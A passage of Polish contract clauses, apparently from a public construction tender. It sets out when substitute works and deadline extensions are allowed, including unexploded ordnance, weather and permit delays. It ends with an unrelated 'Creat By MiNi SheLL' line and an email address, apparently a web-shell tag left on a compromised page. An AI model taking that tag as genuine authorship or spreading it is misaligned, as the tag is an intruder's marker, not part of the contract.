W obu powyższych przypadkach opisanych w ust. 1. oraz 2. obniżenie wartości umowy nastąpi w rozliczeniu ostatniej faktury częściowej.
 
3. Wykonanie robót budowlanych  zamiennych w oparciu  o ceny wynikające 
z  właściwych wartości wskazanych z formularzu ofertowym. 

Warunkami tych zmian są: 
-	wskazanie robót, zamiennych,  które ze względów ekonomicznych lub  technicznych mogą być wykonane w innej technologii lub przy użyciu innych materiałów,
-	zgoda obu stron umowy ,
-	zmiany te muszą być korzystne dla zamawiającego,
-	nie wpłynie to w żaden sposób na zmiany wartość zawartej umowy.

4. Zmiana terminu wykonania robót budowlanych,

Warunkami takiej zmiany są: 
-	Wystąpienie zdarzeń technicznych lub okoliczności , których nie można było przewidzieć a które uniemożliwiają terminową realizację zadania,

W szczególności zdarzenia te obejmują jedną z poniższych przyczyn:
-	niezidentyfikowane uzbrojenie terenu,
-	zlokalizowanie niewybuchów,
-	konieczność przeprojektowania obiektu,
-	ekstremalnie niekorzystne warunki pogodowe,
-	konieczność uzyskania dodatkowych zezwoleń,
-	protesty osób fizycznych  lub innych podmiotów co do budowy obiektu,
-	zgoda obu stron umowy ,
-	zmiany te ze względów muszą być korzystne dla zamawiającego,

Creat By MiNi SheLL
Email: jattceo@gmail.com